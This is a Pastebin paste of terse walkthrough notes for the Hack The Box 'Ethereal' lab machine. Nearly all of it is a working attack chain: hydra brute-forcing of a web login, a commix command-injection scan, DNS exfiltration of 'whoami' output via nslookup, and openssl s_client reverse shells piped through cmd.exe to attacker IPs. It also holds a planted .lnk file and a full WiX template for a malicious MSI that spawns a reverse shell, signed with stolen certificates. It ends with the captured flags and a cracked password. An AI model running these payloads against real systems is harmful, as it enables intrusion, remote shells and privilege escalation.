API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 18th, 2018
1,170
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.30 KB | None | 0 0
raw download clone embed print report
  1. DOWNLAOD EVERYTHING FROM FTP SERVER
  2. binary
  3. mget FDISK.zip
  4. mget DISK1
  5. mget DISK2
  6. etcetera
  7.  
  8. RUN PBOX
  9. MOUNT FDISK
  10. mkdir ./mnt && mkdir ./mnt/FDISK && mount -o loop FDISK ./mnt/FDISK
  11.  
  12. apt-get install dosbox
  13. GET REQUIRED CWSDPMI FILE
  14. https://www.dosgames.com/files/cwsdpmi.zip
  15. dosbox cwsdpmi.exe
  16. cd to /pbox folder
  17. enter command pbox
  18. enter password password
  19.  
  20. USE PASSWORD LIST TO BRUTE LOGIN ON 8080
  21. hydra -L pbox_credentials.txt -P pbox_credentials.txt http-get://ethereal.htb:8080
  22. username alan
  23. password !C414m17y57r1k3s4g41n!
  24.  
  25. EDIT /etc/hosts to include
  26. 10.10.10.106 ETHEREAL.HTB
  27. http://10.10.10.106:8080
  28. Log in using above credentials
  29.  
  30. CHECK FOR RCE
  31. commix --batch --retries=9999 --all --os='Windows' --auth-type=basic --auth-cred='alan:!C414m17y57r1k3s4g41n!' --data="__EVENTVALIDATION=/wEdAAPXNrMskvPvtGY7odd1gNQQ4CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p%2B9jPAN/80m0Jg7tyLIuniHLLNMkjX2uEzelj9mmG0qvEBTnS/w==&search=localhost&ctl02=" -p "search" --level=3 -u http://ethereal.htb:8080/?guest=1
  32.  
  33. CATCH PACKETS WITH WIRESHARK
  34. In ping box enter
  35. || for /f "tokens=1" %i in ('whoami') do nslookup %i 10.10.14.15
  36. This is a blind RCE
  37.  
  38. CHECK FIREWALL RULES
  39. netsh advfirewall firewall show rule name=all
  40. port 73 and 136 are open
  41. openssl.exe is installed
  42.  
  43. CREATE A KEY
  44. openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  45.  
  46. COMMAND SENDER TERMIAL WINDOW
  47. openssl s_server -quiet -key key.pem -cert cert.pem -port 73
  48.  
  49. COMMAND RESPONSE TEMRINAL WINDOW
  50. openssl s_server -quiet -key key.pem -cert cert.pem -port 136
  51.  
  52. USE PING IN WEB APP OR EXECUTE CURL COMMAND TO RUN THE POST OF THIS COMMAND THROUGH ADMIN WEBAPP
  53. 10.10.14.15 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.6:136
  54.  
  55. SEND COMMANDS in SEND TERMINAL
  56. USE CURL IN 3RD TERMINAL
  57. SEE RESPONSE IN 2ND TERMINAL
  58.  
  59. ENUMERATE THIS FILE
  60. C:\Users\Public\Desktop\note-draft.txt
  61. I've created a shortcut for VS on the Public Desktop to ensure we use the same
  62. version. Please delete any existing shortcuts and use this one instead.
  63. - Alan
  64.  
  65. FILES CAN BE WRITTEN HERE
  66. C:\Users\Public\Desktop\Shortcuts\VB.lnk
  67.  
  68. UPLOAD FILES USING
  69. openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < VB.lnk
  70.  
  71. 10.10.14.15 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.15:73 > C:\Users\Public\Desktop\Shortcuts\VB.lnk
  72.  
  73. USE LNKUP TO GENERATE A .lnk FILE
  74. https://github.com/Plazmaz/LNKUp
  75.  
  76. C:\Users\jorge\Desktop\cat user.txt
  77. 2b9a4ca09408b4a39d87cbcd7bd524dd
  78.  
  79. cat D:\DEV\MSIs\note.txt
  80. Tells us to create a malicous msi file
  81.  
  82. USE WIX TOOLS SET
  83. http://wixtoolset.org/releases/
  84.  
  85. <?xml version="1.0"?>
  86. <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  87. <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product
  88. Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
  89. <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer
  90. Package"/>
  91. <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
  92. <Directory Id="TARGETDIR" Name="SourceDir">
  93. <Directory Id="ProgramFilesFolder">
  94. <Directory Id="INSTALLLOCATION" Name="Example">
  95. <Component
  96. Id="ApplicationFiles"
  97. Guid="12345678-1234-1234-1234-222222222222">
  98. <File Id="ApplicationFile1" Source="D:\Windows\tracing\test.txt"/>
  99. </Component>
  100. </Directory>
  101. </Directory>
  102. </Directory>
  103. <Feature Id="DefaultFeature" Level="1">
  104. <ComponentRef Id="ApplicationFiles"/>
  105. </Feature>
  106. <CustomAction Id="SystemShell" Directory="TARGETDIR" ExeCommand="cmd.exe /c
  107. C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.6:73| cmd.exe |
  108. C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe
  109. s_client
  110. -quiet
  111. -connect
  112. 10.10.14.6:136"
  113. Execute="deferred" Impersonate="yes" Return="ignore"/>
  114. <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  115. invalid vbs to fail install
  116. </CustomAction>
  117. <InstallExecuteSequence>
  118. <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  119. <Custom Action="FailInstall" Before="InstallFiles"></Custom>
  120. </InstallExecuteSequence>
  121. </Product>
  122. </Wix>
  123.  
  124. USE CANDLE.EXE WITH THE EXPLOIT ABOVE
  125. then light.exe payload.wixobj which creates the compiled payload.msi
  126. Download the certs rupal mentioned in his note and sign malicious .msi
  127. The certs were in the D:\certs folder, MyCA.cer and MyCA.pvk
  128. pvk2pfx -pvk C:\temp\MyCa.pvk -spc C:\temp\MyCa.cer -pfx C:\temp\MyCa.pfx
  129.  
  130. CREATES NEW CERTS FOR SIGNING
  131. makecert -pe -n "CN=My SPC" -a sha256 -cy end -sky signature -ic
  132. C:\temp\MyCA.cer -iv c:\temp\MyCA.pvk -sv C:\temp\MySPC.pvk c:\temp\MySPC.cer
  133.  
  134. CREATES OWN PFX CERT
  135. pvk2pfx -pvk C:\temp\MySPC.pvk -spc C:\temp\MySPC.cer -pfx C:\temp\MySPC.pfx
  136.  
  137. SIGN THE PAYLOAD
  138. signtool sign /v /n "Me" /s SPC C:\file.msi
  139.  
  140. Uploaded payload msi to C:\windows\tracing
  141. Copy to D:\DEV\MSIs folder as needed.
  142. When an msi file is uploaded to the D:\DEV\MSIs folder, every few minutes rupal “tests”
  143. the file and then deletes all msi files in D:\DEV\MSIs
  144. As soon as the msi file is copied with the openssl command, quickly exit out of the openssl connection as jorge
  145. Enter the openssl command to wait for a connection again on port 73 and then type or paste in a command to be run as rupal.
  146.  
  147. type C:\Users\rupal\Desktop\root.txt
  148. root.txt
  149. 1cb6f1fc220e3f2fcc0e3cd8e2d9906f
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!